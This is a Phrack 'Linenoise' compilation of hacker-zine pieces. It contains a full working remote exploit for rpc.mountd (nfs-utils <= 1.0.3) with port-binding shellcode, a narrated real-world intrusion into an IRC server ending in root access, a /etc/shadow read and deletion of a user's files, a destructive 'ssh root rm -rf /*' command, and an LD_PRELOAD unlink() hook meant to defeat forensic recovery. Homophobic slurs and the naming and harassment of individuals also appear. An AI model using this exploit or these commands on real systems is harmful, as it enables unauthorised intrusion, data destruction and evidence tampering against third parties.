                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3e, Phile #0x03 of 0x0f

|=-----------------------=[ L I N E N O I S E ]=-------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[ Phrack Staff ]=----------------------------=|


--[ Contents

  1 - A Phrack Editorial Correction
  2 - A Phrack Editorial Correction Part II
  3 - Getting the rm -rf d0wn p@
  4 - This is What Happens When You Talk Shit
  5 - Keeping 0day Safe
  6 - Tripwire is Silly
  7 - Evil Shellcode Developments
  8 - Really Dangerous Cisco Shit Released
  9 - The Defcon Review
 10 - pr0ix IRC Medley
 11 - Project Honeynet Enumeration
 12 - Sebek Sucks
 13 - Bluebox Infoz


|=[ 0x01 ]=--------------------------------------------------------------=|

A Phrack Editorial Correction
by an apologetic phr4ck-st4ff

Phrack would like to apologize for a misprint in our phrack 61 edition!
Apparently the table of contents read as such:

  "Polymorphic Shellcode Engine (.txt)        3 gay d00dz"

This should be amended to say "4 gay d00dz" as there were four authors:

  theo detristan                   theo@ringletwins.com
  tyll ulenspiegel                 tyllulenspiegel@altern.org
  yann_malcom                      yannmalcom@altern.org
  mynheer superbus von underduk    msvu@ringletwins.com

Our wonderful phrack authors were very upset by this misprint, and we would
like to say sorry for neglecting any of our gay gay dungeons+dragonz playing
friends.


|=[ 0x02 ]=--------------------------------------------------------------=|

A Phrack Editorial Correction Part II
by an apologetic phr4ck-st4ff

O'Reilly is suing phrack magazine for plagiarism! Apparently Hijacking Linux
Page Fault Handler (.txt) by "buffer" was ripped directly from the O'Reilly's
Understanding the Linux Kernel series, practically word-for-word. Stand by
and join hands while phrack staff laughs, since phrack isn't subject to
copyright laws. In fact, phrack isn't subject to any human laws!
|=[ 0x03 ]=--------------------------------------------------------------=|

Getting the rm -rf d0wn p@
by Kar3l3ss k4rl

the other day some faggot on efnet was talking shit 2 me so i decided to
take him out. i fired up kontr0l p4n3l | stored user names and passwords
i did a whois on irc to find his host name, found the box in my big list,
and then i issued something like the following on my shell:

  ssh -lroot blah.com "rm -rf /*" &

and i left the process in the background to do it magic, assuming it would
disconnect me when the computer was obliter8d. imagine my surpr1ze when my
target continued talking shit on irc a few minutes later. apparently, some
variantz where rm is aliased to 'rm -i' prevent rm -rf madness! thus my
stealthy hard drive removal failed! the "rm -i" alias stopping attacks is a
very real threat! our solution was swift and simple: always be sure to
issue the following command:

  yes | ssh -lroot blah.com "rm -rf /*" &


|=[ 0x04 ]=--------------------------------------------------------------=|

This is What Happens When You Talk Shit
by the b1g leb0wsk1

2nd Sept 2003 - pr0ix wages war on #phrack

greets pr0ix
greets dvd
you gonna give phrack hell?
yeah
cool
fuck then rad up stargliders.org/phrack/opencult/
add a few ./s for me "{
they are toooooooooo gay :P
even

--- a bit later ---

im guessing SLY packet kid is you?
lets DDDOS them HAA
open a nice bgp

---

After the clear threat of DDoS from the self-proclaimed "Prince of packets"
pr0ix, #phrack strikes back...

.----------------------------------------- -- -
| pr0ix (pr0ix@apollo.hack.co.za) (South Africa)
: ircname  : no justice - no peace
| server   : irc.servercentral.net (chase the dragon)
-:- BitchX: Checking tables...
-:- BitchX: nslookup of pr0ix!pr0ix@apollo.hack.co.za failed.

Hmmm... pr0ix thinks his spoof can protect him but thanks to an anonymous
supporter,

-gaypr0ix(d0rknet@i.hate.pr0ix)- pr0ix is on irc.scservers.com.
evil:~# host irc.scservers.com
irc.scservers.com A 64.202.97.154
evil:~#

Ok, lets see if our unpublished 0dayz will work? :PpPPpPPpPPPpPpPpPp

evil:~# nc irc.scservers.com 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 05 Sep 2003 16:25:37 GMT
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux)

Lets go...

evil:~# ./a.out -v64.202.97.154 -p80 -o12 -t6
Attacking 64.202.97.154:80 - Apache 1.3.27
progress[#######]
Linux irc.scservers.com 2.4.1-008stab043.15.swsoft-smp #1 SMP Thu Mar 20 16:47:30 MSK 2003 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin)
id pr0ix
uid=512(pr0ix) gid=512(pr0ix) groups=512(pr0ix)
#hohoho time for more skillz
whereis suexec
suexec: /usr/sbin/suexec /usr/share/man/man8/suexec.8.gz
ls -al /usr/sbin/suexec
-r-s--x---    1 root     apache      11732 May 15 06:09 /usr/sbin/suexec
cat << EOF >> suexp.c
/* REMOVED - sorry kids
 * Phrack supports Non-disclosure */
EOF
make suexp
cc     suexp.c   -o suexp
./suexp -t6
id
uid=0(root) gid=0(apache) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
#h3h3h3
ps ax | grep pr0ix
29004 pts/0    S      0:21 BitchX pr0ix irc.servercentral.net
 7200 pts/6    S      0:00 grep pr0ix
ls -al ~pr0ix
total 26731
drwx------    6 pr0ix    pr0ix        2048 Sep  5 08:26 .
drwxr-xr-x   37 root     root         1024 Aug 26 08:47 ..
-rw-rw-r--    1 pr0ix    pr0ix           5 Jan 10  2003 1
-rw-r--r--    1 pr0ix    pr0ix     5261404 Jan 16  2003 8310mcu554.zip
-rw-r--r--    1 pr0ix    pr0ix        3975 Sep  5 03:15 ao.tgz
-rw-------    1 pr0ix    pr0ix       13253 Sep  5 08:26 .bash_history
-rw-rw-r--    1 pr0ix    pr0ix      144847 Dec 26  2002 .bash_history.save
-rw-r--r--    1 pr0ix    pr0ix          24 Oct  7  2002 .bash_logout
-rw-r--r--    1 pr0ix    pr0ix         244 Oct  7  2002 .bash_profile
-rw-r--r--    1 pr0ix    pr0ix         124 Oct  7  2002 .bashrc
drwx------    4 pr0ix    pr0ix        1024 Aug 29 06:15 .BitchX
-rw-rw-r--    1 pr0ix    pr0ix          36 Jul 29 02:36 .bitchxrc
-rw-r--r--    1 pr0ix    pr0ix       80687 Aug  5 09:19 blah2.jpg
-rw-r--r--    1 pr0ix    pr0ix       61861 Aug  6 11:47 blah.jpg
-rw-r--r--    1 pr0ix    pr0ix      816279 Jan 16  2003 b.zip
-rw-r--r--    1 pr0ix    pr0ix      441952 Aug 11 09:13 CANVAS3_VivianLi.rar
-rw-r--r--    1 pr0ix    pr0ix     2353357 Aug  6 11:48 cv4.zip
-rw-r--r--    1 pr0ix    pr0ix       15836 Aug  5 08:49 dcom.c
-rw-r--r--    1 pr0ix    pr0ix       15836 Aug  5 08:53 dcom-cygwin-harq.c
-rw-r--r--    1 pr0ix    pr0ix       14336 Aug  5 08:53 dcom-cygwin-harq.exe
-rw-r--r--    1 pr0ix    pr0ix       18983 Aug  5 09:18 dcom-liunx-harq
-rw-r--r--    1 pr0ix    pr0ix       14822 Aug  5 09:18 dcom-liunx-harq.c
-rw-rw-r--    1 pr0ix    pr0ix         487 Jun  7  2002 FILE_ID.DIZ
-rw-rw-r--    1 pr0ix    pr0ix        2621 Jul 25 10:17 heh
-rw-r--r--    1 pr0ix    pr0ix        4070 Aug 11 09:08 mircexploit-v6.03.c
drwxr-xr-x    2 pr0ix    pr0ix        1024 Jan 10  2003 .ncftp
-rw-rw-r--    1 pr0ix    pr0ix        1356 Mar 13  2000 new.c
-rw-rw-r--    1 pr0ix    pr0ix      286795 Jun  7  2002 NOKIA_8310_SERVICE_BULLETIN_v1_0-ROYAL.rar
-rw-r--r--    1 pr0ix    pr0ix       12058 Jul 23 02:24 opcode.exe
-rw-rw-r--    1 pr0ix    pr0ix      825624 Jan 10  2003 Picture 001.jpg
drwxr-xr-x    2 pr0ix    pr0ix        1024 Jan 16  2003 public_html
-rw-r--r--    1 pr0ix    pr0ix      794624 Aug  6 08:33 RetinaRPCDCOM.exe
-rw-r--r--    1 pr0ix    pr0ix      290419 Jan 16  2003 rn8310sb.zip
-rw-rw-r--    1 pr0ix    pr0ix       12945 Jan  9  2003 root.c
-rw-rw-r--    1 pr0ix    pr0ix       15681 Jun  8  2002 ROYAL.NFO
-rw-r--r--    1 pr0ix    pr0ix       22317 Aug  4 14:52 rpc-int.exe
-rw-r--r--    1 pr0ix    pr0ix       16384 Aug  6 10:15 rpctest-1026.exe
-rw-r--r--    1 pr0ix    pr0ix       16384 Aug  6 08:28 rpctest.exe
-rw-r--r--    1 pr0ix    pr0ix       11712 Aug  6 08:28 rpctest.rar
-rw-r--r--    1 pr0ix    pr0ix       12834 Apr 19 05:48 sormount.c
drwx------    2 pr0ix    pr0ix        1024 Sep  1 07:23 .ssh
-rw-rw-r--    1 pr0ix    pr0ix    15384575 Aug  5 05:31 synlog1
-rw-r--r--    1 pr0ix    pr0ix         349 Apr 21 13:41 targets
-rw-r--r--    1 pr0ix    pr0ix       15305 Aug  4 14:42 universal.c.txt
-rw-r--r--    1 pr0ix    pr0ix           0 Aug 20 04:39 upload.html
-rwxrwxr-x    1 pr0ix    pr0ix         112 May 14  2002 vhosts.sh
-rw-------    1 pr0ix    pr0ix        1778 Aug 26 04:33 .viminfo
-rw-r--r--    1 pr0ix    pr0ix       17025 Jul 31 02:47 win32dcom.cpp
-rw-r--r--    1 pr0ix    pr0ix      159802 Aug 11 02:21 win32dcom.exe
-rw-rw-r--    1 pr0ix    pr0ix       85136 Aug 30 18:04 zasta.JPG
-rw-r--r--    1 pr0ix    pr0ix       10240 Oct 14  2002 zones.tar
#HmMmmMMMmmMMm... pr0ix needs to get more codes for us :((((
#At phrack we like to give something back to our supporterz
cat sormount.c
/*
 * remote exploit for rpc.mountd (nfs-utils <= 1.0.3)
 * by sorbo (sorbox@yahoo.com)
 * http://www.darkircop.org
 *
 * The problem lies in xlog() where the following code exists:
 *     if ((n = strlen(buff)) > 0 && buff[n-1] != '\n') {
 *         buff[n++] = '\n'; buff[n++] = '\0';
 *     }
 *
 * a NULL byte will overflow buff, thus overwriting the LSB of the frame pointer.
 *
 * We do not control the area pointed by the new frame pointer, but we do control the area
 * of &hp (in auth_authenticate()), thus we can overwrite hp and make it point to an area we like.
 * hp will get free()d so we can make it point to our fake chunk which can overwrite ebp+4, which
 * is the area ret will look for its return address (when ebp is copied to stack pointer and the
 * ret is popped when leaving auth_authenticate()).
 *
 * Have fun
 *
 * Greetz: gunzip@ircnet
 *
 */

/* headers the code needs; the original include names were lost in extraction */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <rpc/rpc.h>
#include <rpcsvc/mount.h>   /* dirpath, MOUNTPROG, MOUNTVERS, MOUNTPROC_MNT, MNTPATHLEN */

char shellcode[] =
/* port bind tcp/30464 ***/
/* jump 10 */
"\xeb\x0a"
/* overwritten bit */
"neveznevez"
/* fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */
"\x31\xc0"              // xorl %eax,%eax
"\x31\xdb"              // xorl %ebx,%ebx
"\x31\xc9"              // xorl %ecx,%ecx
"\x31\xd2"              // xorl %edx,%edx
"\xb0\x66"              // movb $0x66,%al
"\xb3\x01"              // movb $0x1,%bl
"\x51"                  // pushl %ecx
"\xb1\x06"              // movb $0x6,%cl
"\x51"                  // pushl %ecx
"\xb1\x01"              // movb $0x1,%cl
"\x51"                  // pushl %ecx
"\xb1\x02"              // movb $0x2,%cl
"\x51"                  // pushl %ecx
"\x8d\x0c\x24"          // leal (%esp),%ecx
"\xcd\x80"              // int $0x80
/* port is 30464 !!! */
/* bind(fd, (struct sockaddr)&sin, sizeof(sin) ) */
"\xb3\x02"              // movb $0x2,%bl
"\xb1\x02"              // movb $0x2,%cl
"\x31\xc9"              // xorl %ecx,%ecx
"\x51"                  // pushl %ecx
"\x51"                  // pushl %ecx
"\x51"                  // pushl %ecx
/* port = 0x77, change if needed */
"\x80\xc1\x77"          // addb $0x77,%cl
"\x66\x51"              // pushw %cx
"\xb1\x02"              // movb $0x2,%cl
"\x66\x51"              // pushw %cx
"\x8d\x0c\x24"          // leal (%esp),%ecx
"\xb2\x10"              // movb $0x10,%dl
"\x52"                  // pushl %edx
"\x51"                  // pushl %ecx
"\x50"                  // pushl %eax
"\x8d\x0c\x24"          // leal (%esp),%ecx
"\x89\xc2"              // movl %eax,%edx
"\x31\xc0"              // xorl %eax,%eax
"\xb0\x66"              // movb $0x66,%al
"\xcd\x80"              // int $0x80
/* listen(fd, 1) */
"\xb3\x01"              // movb $0x1,%bl
"\x53"                  // pushl %ebx
"\x52"                  // pushl %edx
"\x8d\x0c\x24"          // leal (%esp),%ecx
"\x31\xc0"              // xorl %eax,%eax
"\xb0\x66"              // movb $0x66,%al
"\x80\xc3\x03"          // addb $0x3,%bl
"\xcd\x80"              // int $0x80
/* cli = accept(fd, 0, 0) */
"\x31\xc0"              // xorl %eax,%eax
"\x50"                  // pushl %eax
"\x50"                  // pushl %eax
"\x52"                  // pushl %edx
"\x8d\x0c\x24"          // leal (%esp),%ecx
"\xb3\x05"              // movb $0x5,%bl
"\xb0\x66"              // movb $0x66,%al
"\xcd\x80"              // int $0x80
/* dup2(cli, 0) */
"\x89\xc3"              // movl %eax,%ebx
"\x31\xc9"              // xorl %ecx,%ecx
"\x31\xc0"              // xorl %eax,%eax
"\xb0\x3f"              // movb $0x3f,%al
"\xcd\x80"              // int $0x80
/* dup2(cli, 1) */
"\x41"                  // inc %ecx
"\x31\xc0"              // xorl %eax,%eax
"\xb0\x3f"              // movb $0x3f,%al
"\xcd\x80"              // int $0x80
/* dup2(cli, 2) */
"\x41"                  // inc %ecx
"\x31\xc0"              // xorl %eax,%eax
"\xb0\x3f"              // movb $0x3f,%al
"\xcd\x80"              // int $0x80
/* execve("//bin/sh", ["//bin/sh", NULL], NULL); */
"\x31\xdb"              // xorl %ebx,%ebx
"\x53"                  // pushl %ebx
"\x68\x6e\x2f\x73\x68"  // pushl $0x68732f6e
"\x68\x2f\x2f\x62\x69"  // pushl $0x69622f2f
"\x89\xe3"              // movl %esp,%ebx
"\x8d\x54\x24\x08"      // leal 0x8(%esp),%edx
"\x31\xc9"              // xorl %ecx,%ecx
"\x51"                  // pushl %ecx
"\x53"                  // pushl %ebx
"\x8d\x0c\x24"          // leal (%esp),%ecx
"\x31\xc0"              // xorl %eax,%eax
"\xb0\x0b"              // movb $0xb,%al
"\xcd\x80"              // int $0x80
/* exit(%ebx) */
"\x31\xc0"              // xorl %eax,%eax
"\xb0\x01"              // movb $0x1,%al
"\xcd\x80";             // int $0x80

/* OK here are the instructions to get offsets:
 * align:
 *   gdb /usr/sbin/rpc.mountd
 *   press c
 *   run ./exploit -t 1 -a 0 -v 127.0.0.1
 *   it will segfault and do info r edx
 *   repeats steps (incrementing align untill edx = 0x4141414e
 *
 * ebp:
 *   gdb, press c, run exploit, it will seg, type up, and info r ebp
 *   it should end with 00.. that is ur ebp
 *
 * path:
 *   gdb, press c, run exploit, it will seg
 *   type maintenance info sections, and get end of .bss section (where heap starts)
 *   do something like x/100000bx 0x08058ce4 where is end of .bss
 *   press enter untill you find a bunch of 0x41
 *   look for 0x2f 0x41 0x41 0x41
 *   0x2f == '/' which is the start of path. The address of 0x2f is the address of path
 *
 */

struct target_info {
    char *desc;   /* description */
    int align;    /* will be 0,1,2,3 */
    int ebp;      /* what ebp will look like once overwritten */
    int path;     /* address of path variable on heap */
};

struct target_info targets[] = {
    { "Slackware 8.1", 3, 0xbfffe000, 0x805d17c },
    { "Slackware 8.0", 2, 0xbfffe100, 0x805d7bc },
    { "Debug (gdb)",   0, 0xbfffe100, 0x41414142 }
};

#define TIMEOUT 5 /* timeout for rpc request in seconds */

bool_t xdr_dirpath(XDR *xdrs, dirpath *objp)
{
    return xdr_string(xdrs, objp, MNTPATHLEN);
}

/* try to connect to the shell */
void ride(char *ip)
{
    fd_set rfds;
    int rd;
    int s;
    struct sockaddr_in s_in;
    char buff[1024];

    s_in.sin_port = htons(30464);
    s_in.sin_family = PF_INET;
    s_in.sin_addr.s_addr = inet_addr(ip);

    s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(s < 0) {
        perror("socket()");
        exit(-1);
    }

    if(connect(s, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) {
        close(s);
        return; /* failed */
    }

    /* successs */
    send(s, "id;\n", 4, 0);
    while(1) {
        FD_ZERO(&rfds);
        FD_SET(0, &rfds);
        FD_SET(s, &rfds);

        if(select(s+1, &rfds, NULL, NULL, NULL) < 1)
            exit(0);

        if(FD_ISSET(0, &rfds)) {
            if( (rd = read(0, buff, sizeof(buff))) < 1)
                exit(0);
            if( send(s, buff, rd, 0) != rd)
                exit(0);
        }
        if(FD_ISSET(s, &rfds)) {
            if( (rd = recv(s, buff, sizeof(buff), 0)) < 1)
                exit(0);
            write(1, buff, rd);
        }
    }
}

void exploit(struct target_info target, char *ip)
{
    char egg[1024];
    dirpath eggd;
    int *ptr;
    CLIENT *client;
    int s;
    struct sockaddr_in s_in;
    struct timeval tv;
    char chunk[] = "\xfc\xff\xff\xff"  /* prevsize */
                   "\xfc\xff\xff\xff"  /* size */
                   "\xa1\xff\xff\xbf"  /* junk */
                   "\xa1\xff\xff\xbf"  /* bk */
                   "\xa1\xff\xff\xbf"; /* fd */

    /* initial set up note it must start with / */
    memset(egg, 'A', sizeof(egg));
    egg[sizeof(egg)-1] = 0;
    egg[0] = '/';

    /* fill up with address of our fake chunk */
    printf("Address of fake chunk= 0x%x\n", target.path+4+8);
    for(ptr = (int*)((char*)egg+target.align+300); ptr < (int*)&egg[sizeof(egg)-6]; ptr++)
        *ptr = target.path+4+8; /* addr of fake chunk */

    /* setup our chunk and copy it in egg */
    ptr = (int*)((char*)chunk+12); /* bk */
    printf("Addr of ret= 0x%x\n", target.ebp+4);
    *ptr = target.ebp+4-12; /* addr of ret-12 */
    ptr++; /* fd */
    printf("Addr of shellcode= 0x%x\n", target.path+40);
    *ptr = target.path+40; /* addr of shellcode */
    memcpy(egg+4, chunk, strlen(chunk));

    /* copy our shellcode */
    memcpy(egg+40, shellcode, strlen(shellcode));
    eggd = &egg[0];

    /* connect to mountd and send request */
    s = RPC_ANYSOCK;
    s_in.sin_family = PF_INET;
    s_in.sin_port = 0;
    if(!inet_aton(ip, &s_in.sin_addr)) {
        printf("Invalid ip %s\n", ip);
        exit(-1);
    }
    client = clnttcp_create(&s_in, MOUNTPROG, MOUNTVERS, &s, 0, 0);
    if(!client) {
        clnt_pcreateerror("clnttcp_create");
        exit(-1);
    }
    client->cl_auth = authunix_create_default();
    tv.tv_usec = 0;
    tv.tv_sec = TIMEOUT;

    if(clnt_call(client, MOUNTPROC_MNT, (xdrproc_t) xdr_dirpath, (void *)&eggd,
                 (xdrproc_t) xdr_void, NULL, tv) == RPC_SUCCESS) {
        printf("Server managed to mount our path... something went wrong\n");
        exit(-1);
    }
    printf("Exploitation done... attempting to connect to shell\n");
    ride(ip);
    printf("Failed...\n");
}

void print_targets()
{
    int tcount = sizeof(targets)/sizeof(struct target_info);
    int i;

    printf("Id\tDescription\talign\t\tpath\t\tebp\n");
    for(i = 0; i < tcount; i++) {
        printf("%d)\t%s\t%d\t\t0x%x\t0x%x\n", i,
               targets[i].desc, targets[i].align, targets[i].path, targets[i].ebp);
    }
}

void usage(char *p)
{
    printf("Usage: %s \n", p);
    printf("-t\t\ttarget\n");
    printf("-a\t\talign\n");
    printf("-p\t\tpath\n");
    printf("-e\t\tebp\n");
    printf("-v\t\tvictim ip\n");
    printf("\n");
    print_targets();
    exit(0);
}

int main(int argc, char *argv[])
{
    int opt;
    int t = -1;
    int align = -1;
    int path = -1;
    int ebp = -1;
    char ip[16];

    ip[0] = 0;
    printf("rpc.mountd (nfs-utils <= 1.0.3) remote exploit by sorbo (sorbox@yahoo.com)\n");

    while( (opt = getopt(argc, argv, "t:a:hp:e:v:")) != -1) {
        switch(opt) {
        case 't':
            t = atoi(optarg);
            if(t >= sizeof(targets)/sizeof(struct target_info)) {
                printf("Invalid target %d\n", t);
                exit(-1);
            }
            break;
        case 'a':
            align = atoi(optarg);
            break;
        case 'p':
            if(sscanf(optarg, "%x", &path) != 1) {
                printf("Invalid path addr\n");
                exit(-1);
            }
            break;
        case 'e':
            if(sscanf(optarg, "%x", &ebp) != 1) {
                printf("Invalid ebp addr\n");
                exit(-1);
            }
            break;
        case 'v':
            snprintf(ip, sizeof(ip), "%s", optarg);
            break;
        case 'h':
        default:
            usage(argv[0]);
        }
    }

    if(t < 0) {
        printf("Select target\n");
        usage(argv[0]);
    }
    if(strlen(ip) == 0) {
        printf("Select victim\n");
        usage(argv[0]);
    }

    if(align != -1)
        targets[t].align = align;
    if(path != -1)
        targets[t].path = path;
    if(ebp != -1)
        targets[t].ebp = ebp;

    printf("Attacking target %s\n", targets[t].desc);
    printf("Align= %d\n", targets[t].align);
    exploit(targets[t], ip);
    exit(0);
}
#WOW thanks phrack!!!
cat /etc/shadow
#cool! our old friend seiki ;PpPPPpPPpPPppPP
ps ax | grep pr0ix
29004 pts/0    S      0:21 BitchX pr0ix irc.servercentral.net
28828 pts/6    S      0:00 grep pr0ix
kill -9 29004
-:- SignOff pr0ix: #darknet (EOF from client)
# bye bye pr0ix :(
w
 12:16pm  up 148 days, 21:00,  10 users,  load average: 0.00, 0.00, 0.03
USER     TTY      FROM              LOGIN@   IDLE    JCPU    PCPU   WHAT
pr0ix    pts/0    reptile.cube11.n  Mon 9am  2:15m   30.11s  8.80s  scr-bx
mjp      pts/2    ool-18b92e85.dyn  8:11am   3:23    0.11s   0.07s  screen -r
mjp      pts/3    -                 8:11am   4:04m   0.11s   0.11s  /bin/bash
munky    pts/5    -                 6:51am   2:28m   8:00    8:00   BitchX
seiki    pts/11   -                 10:35am  18:41   2:53    2:53   irssi
ara      pts/4    -                 Tue 8am  25:12m  2:04    2:04   BitchX irc.servercentral.net
munky    pts/13   207.91.250.66     6:51am   2:28m   0.10s   0.03s  screen -r
ara      pts/16   209-102-214-3.ip  Tue 8am  25:12m  1.10s   1.04s  screen -r
seiki    pts/18   user-0cceoih.cab  10:27am  18:41   0.11s   0.05s  screen -dr
mjp      pts/20   -                 8:11am   3:23    18.70s  18.70s ssh
#ok, im bored now... rm'in time!!!!
rm -rf ~pr0ix
ls -ald ~pr0ix
ls: ~pr0ix: No such file or directory
mkdir /home/pr0ix
chown pr0ix.pr0ix /home/pr0ix
cd /home/pr0ix
touch PHRACK_OWNS_J00
# Phrack 8==================D ~~~~~~~~~ pr0ix
^C
evil:~#

~pr0ix COMING SOON !!!
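The xlog() newline-append logic that sorbo's header comment quotes is the whole bug, so here it is isolated as an added example (not code from the article or from nfs-utils): the vulnerable form beside a hardened one, run against a constructed 16-byte buffer whose following byte stands in for the saved frame pointer's LSB, so the one-byte overrun the comment describes can be observed directly. BUFF_LEN, struct frame and the 0xf0 marker are all constructed for the demo.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUFF_LEN 16 /* constructed size for the demo; the real buffer is larger */

/* Constructed model of the stack frame around buff: the byte right after the
 * array plays the part of the least significant byte of the saved frame
 * pointer, which is where the stray NUL lands according to sorbo's comment. */
struct frame {
    char buff[BUFF_LEN];
    unsigned char saved_ebp_lsb;
};

/* Vulnerable form: the two stores from the quoted xlog() code, with no check
 * that buff has room for them. The stores go through the raw bytes of the
 * frame so the one-past-the-end write is observable here instead of being
 * undefined behaviour; the indices are exactly those of buff[n++]. */
int xlog_append_vuln(struct frame *f)
{
    unsigned char *bytes = (unsigned char *)f;
    size_t n = strlen(f->buff);

    if (n > 0 && f->buff[n - 1] != '\n') {
        bytes[n++] = '\n';  /* buff[n++] = '\n'; */
        bytes[n++] = '\0';  /* buff[n++] = '\0'; -- lands on saved_ebp_lsb when buff is full */
    }
    return (int)n;
}

/* Hardened form: refuse the append when '\n' plus the terminator would not
 * fit, and leave the buffer and the surrounding frame untouched in that case. */
int xlog_append_fixed(struct frame *f)
{
    size_t n = strlen(f->buff);

    if (n > 0 && f->buff[n - 1] != '\n') {
        if (n + 2 > BUFF_LEN)  /* need room for '\n' and '\0' */
            return -1;
        f->buff[n++] = '\n';
        f->buff[n] = '\0';
    }
    return (int)n;
}

/* Fill a frame with an msglen-byte message of 'A's (capped so it still fits
 * with its terminator) and put a recognisable value in the frame-pointer byte. */
void frame_init(struct frame *f, size_t msglen)
{
    if (msglen > BUFF_LEN - 1)
        msglen = BUFF_LEN - 1;
    memset(f->buff, 'A', BUFF_LEN);
    f->buff[msglen] = '\0';
    f->saved_ebp_lsb = 0xf0;
}

int main(void)
{
    struct frame f;
    int r;

    frame_init(&f, BUFF_LEN - 1);   /* buffer completely full: the xlog() case */
    r = xlog_append_vuln(&f);
    printf("vulnerable: returned %d, frame-pointer byte now 0x%02x\n", r, f.saved_ebp_lsb);

    frame_init(&f, BUFF_LEN - 1);
    r = xlog_append_fixed(&f);
    printf("hardened:   returned %d, frame-pointer byte still 0x%02x\n", r, f.saved_ebp_lsb);
    return 0;
}
```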
|=[ 0x05 ]=--------------------------------------------------------------=|

Keeping 0day safe
by anonymous

/*
 * Apparently honeynet has new ideas of how to steal your warez!
 * They're more sophisticated than ever!
 * Not just to be confined to HD MOORE sitting alone in a room, reading
 * full tcpdump logs (like shimomura) and piecing together the exploits into
 * his elite perl scripts for metadata.
 *
 * Now, the strategy is to let lamers compile exploits on owned boxes, and
 * copy them over into safe storage when unlink() is called.... for example,
 * temporary gcc assembly and preprocessor files will be backed up, leaving
 * your original code for lance spitzner to sed /s/.. your name out of the
 * headers, replace your name with his, sell it to iDEFENSE, and hail it as
 * another victory for project honeynet.
 *
 * No more! Compile this and LD_PRELOAD or LD_LIBRARY_PATH it before whatever
 * you do. Yea I know this code is lame, but if it prevents 0day from getting
 * lost then it was probably worth the 5 minutes.
 *
 * gcc -Wall -fpic -c pre_unlink.c
 * ld -Bshareable -o pre_unlink.so pre_unlink.o
 * and change "LIBC_PATH" to the path of libc on your system
 */

/* headers the code needs; the original include names were lost in extraction */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/stat.h>

#define DEBUG 1
#define LIBC_PATH "/usr/lib/libc.so.12"
#define RANDOM_PATH "/dev/urandom"
#define BLOCK_SIZE 4096

int (*xunlink) (const char *);   /* the real unlink(), resolved from libc in _init() */
int unlink (const char *path);
void get_random_data (int fd, unsigned int len);

/* uh oh this function doesn't comply with the 52 pass secure dod wipe, so i'm
   sure michael zalewski or dvdman will publish an advisory soon but who karez
   cuz everybody knowz electron micr0sk0pez r used 4 microbiology not forensix */
void
get_random_data (int fd, unsigned int len)
{
  static int is_open = 0;
  static int randfd;
  char buf[BLOCK_SIZE];

  if (!is_open)
    {
      randfd = open (RANDOM_PATH, O_RDONLY);
      if (randfd < 0)
        {
          perror ("open");
          fprintf (stderr, "Error opening random data file: %s\n", RANDOM_PATH);
          exit (EXIT_FAILURE);
        }
      is_open = 1;
    }

  memset (buf, 0x41, sizeof (buf));
  if (read (randfd, buf, len) != len)
    {
      perror ("read");
      fprintf (stderr, "Error fetching random data!\n");
      exit (EXIT_FAILURE);
    }

  /* overwrite the next len bytes of the file at its current offset */
  if (write (fd, buf, len) != len)
    {
      perror ("write");
      fprintf (stderr, "Error writing random data!\n");
      exit (EXIT_FAILURE);
    }

  return;
}

/* replacement unlink(): overwrite the file with random data, then hand off
   to the real unlink() saved in xunlink */
int
unlink (const char *path)
{
  struct stat sb;
  int fd, result;
  unsigned int i;

#ifdef DEBUG
  fprintf (stderr, "unlink(%s) ...\n", path);
#endif

  if (stat (path, &sb) < 0)
    {
      perror ("stat");
      fprintf (stderr, "unlink() on %s: unable to stat this file.\n", path);
      if (errno == ENOENT)
        goto do_unlink;
      exit (EXIT_FAILURE);
    }

  if ((fd = open (path, O_RDWR)) < 0)
    {
      perror ("open");
      fprintf (stderr, "unlink() on %s: unable to open this file for writing.\n", path);
      if (errno == ENOENT)
        goto do_unlink;
      exit (EXIT_FAILURE);
    }

  for (i = 0; i < sb.st_size; )
    {
      unsigned int to_write;

      /* wowow optimized! tanenbaum would be proud! */
      if ((sb.st_size - i) >= BLOCK_SIZE)
        to_write = BLOCK_SIZE;
      else
        to_write = (sb.st_size - i);

      get_random_data (fd, to_write);
      i += to_write;
    }

  close (fd);

do_unlink:
  result = xunlink (path);
  return result;
}

/* runs when the shared object is loaded: resolve the real unlink() from libc */
void
_init ()
{
  void *handle;

  handle = dlopen (LIBC_PATH, RTLD_LAZY);
  if (handle == NULL)
    {
      fprintf (stderr, "Error preloading library: %s\n", dlerror ());
      exit (EXIT_FAILURE);
    }

  if ((xunlink = dlsym (handle, "unlink")) == NULL)
    {
      fprintf (stderr, "Error hijacking unlink(): %s\n", dlerror ());
      exit (EXIT_FAILURE);
    }

  return;
}


|=[ 0x06 ]=--------------------------------------------------------------=|

Tripwire is Silly
by The Blackhat Moriaty

Over recent years we have seen admins faced with a deluge of rootkits, such
as the infamous Linux Root Kit. This ingeniously and originally named tool
replaces system binaries such as netstat, ls, ps and top! When an admin
searches for haxor files or unauthorized network connections he sees only
what the hacker wants him to see..... everywhere admins are in fear and
confusion.

Until one day, out of the flames and panic comes... Tripwire, inc! With
their flashy new HIDS (yes guys, Host-based Intrusion Detection System) they
promised to save the world from modified files. A lot of time and effort
went into making tripwire secure. You need not one, but two passwords to
modify tripwire's database, as it itself is heavily encrypted to prevent
tampering.

In response to this, infamous hackers such as Optyx of team Uberh4x0r
created a series of steadily worsening kernel-based rootkits such as KIS
(Keep It Superfluous). Now, unfortunately, the days of kernel-based rootkits
are long gone. Although a lot of hackers haven't quite caught up with this
fact yet, RedHat (*the* #1 Linux purveyor) now ship a kernel that doesn't
export the symbol for sys_call_table! Oh gno! Once again, it looks as if
Tripwire, inc has found its niche in the information security paradigm.
Without kernel level support how are we ever gonna be able to keep a trojan
on a box! (At the moment maybe some people are sitting there saying "What,
